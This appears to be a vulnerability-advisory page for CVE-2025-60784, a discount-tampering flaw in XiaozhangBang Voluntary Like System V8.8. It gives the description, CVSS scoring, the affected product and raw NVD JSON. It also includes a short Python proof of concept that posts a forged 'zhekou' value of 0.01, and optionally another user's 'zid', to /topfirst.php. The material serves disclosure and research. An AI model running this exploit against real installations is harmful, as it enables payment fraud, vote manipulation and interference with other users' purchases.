Security Vulnerability Report
中文
CVE-2025-60784 CVSS 6.5 MEDIUM

CVE-2025-60784

Published: 2025-11-05 21:15:36
Last Modified: 2026-01-09 17:37:02

Description

A vulnerability in the XiaozhangBang Voluntary Like System V8.8 allows remote attackers to manipulate the zhekou parameter in the /topfirst.php Pay module, enabling unauthorized discounts. By sending a crafted HTTP POST request with zhekou set to an abnormally low value, an attacker can purchase votes at a reduced cost. Furthermore, by modifying the zid parameter, attackers can influence purchases made by other users, amplifying the impact. This issue stems from insufficient server-side validation of these parameters, potentially leading to economic loss and unfair manipulation of vote counts.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:xiaozhangbang:voluntary_like_system:8.8:*:*:*:*:*:*:* - VULNERABLE
XiaozhangBang Voluntary Like System V8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60784 PoC - XiaozhangBang Voluntary Like System V8.8 # Vulnerable Parameter: zhekou (discount) and zid (user ID) TARGET_URL = "http://target.com/topfirst.php" def exploit_discount_vulnerability(): """ Exploit for CVE-2025-60784: Unauthorized discount via zhekou parameter manipulation """ # Step 1: Login to obtain valid session login_url = "http://target.com/login.php" login_data = { "username": "attacker", "password": "password123" } session = requests.Session() # session.post(login_url, data=login_data) # Step 2: Craft malicious POST request with abnormally low zhekou value exploit_data = { "zhekou": "0.01", # Abnormally low discount value "zid": "12345", # Target user ID (optional - for cross-user attack) "vote_id": "100", "quantity": "100" } # Step 3: Send exploit request try: response = session.post(TARGET_URL, data=exploit_data, timeout=10) if response.status_code == 200: print("[+] Exploit sent successfully") print(f"[*] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": print("CVE-2025-60784 PoC - XiaozhangBang V8.8") exploit_discount_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60784", "sourceIdentifier": "[email protected]", "published": "2025-11-05T21:15:35.903", "lastModified": "2026-01-09T17:37:02.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the XiaozhangBang Voluntary Like System V8.8 allows remote attackers to manipulate the zhekou parameter in the /topfirst.php Pay module, enabling unauthorized discounts. By sending a crafted HTTP POST request with zhekou set to an abnormally low value, an attacker can purchase votes at a reduced cost. Furthermore, by modifying the zid parameter, attackers can influence purchases made by other users, amplifying the impact. This issue stems from insufficient server-side validation of these parameters, potentially leading to economic loss and unfair manipulation of vote counts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xiaozhangbang:voluntary_like_system:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "49EC1856-675C-418A-9E93-B8753C774BEA"}]}]}], "references": [{"url": "https://github.com/GoogTech/CVE/blob/master/Incorrect%20Access%20Control/Incorrect-Access-Control-in-XiaozhangBang-Voluntary-Like-System-V8.8.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/GoogTech/CVE/blob/master/Incorrect-Access-Control-in-XiaozhangBang-Voluntary-Like-System-V8.8.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}